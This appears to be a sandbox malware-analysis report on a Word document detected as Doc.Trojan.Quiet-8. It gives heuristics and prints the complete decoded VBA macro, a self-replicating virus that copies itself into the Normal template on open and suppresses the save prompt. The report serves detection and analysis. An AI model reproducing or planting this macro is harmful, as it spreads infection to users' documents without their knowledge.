MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a malicious Word document containing a VBA macro. The macro is designed to copy itself to the Normal template, likely to achieve persistence. The 'Document_open' subroutine is present, indicating it executes upon opening the document. No external network activity or specific exploit was identified.
Heuristics 3
-
ClamAV: Doc.Trojan.Quiet-8 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Quiet-8
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1014 bytes |
SHA-256: 9080040dd3afbfa0135e4c9818a3191ae6181de9e86ad8718c2b474bec36ea47 |
|||
|
Detection
ClamAV:
Doc.Trojan.Quiet-8
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private source As Object
Private dest As Object
Private Sub Document_Close()
End Sub
Private Sub Document_open()
Application.Options.VirusProtection = True
Set source = ActiveDocument.VBProject.VBComponents.Item(1)
Set dest = NormalTemplate.VBProject.VBComponents.Item(1)
If dest.codemodule.countoflines = 0 Then
For i = 1 To source.codemodule.countoflines
dest.codemodule.insertlines i, source.codemodule.lines(i, 1)
Next i
Application.Options.SaveNormalPrompt = False
End If
If source.codemodule.countoflines = 0 Then
For i = 1 To dest.codemodule.countoflines
source.codemodule.insertlines i, dest.codemodule.lines(i, 1)
Next i
ActiveDocument.SaveAs (ActiveDocument.FullName)
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.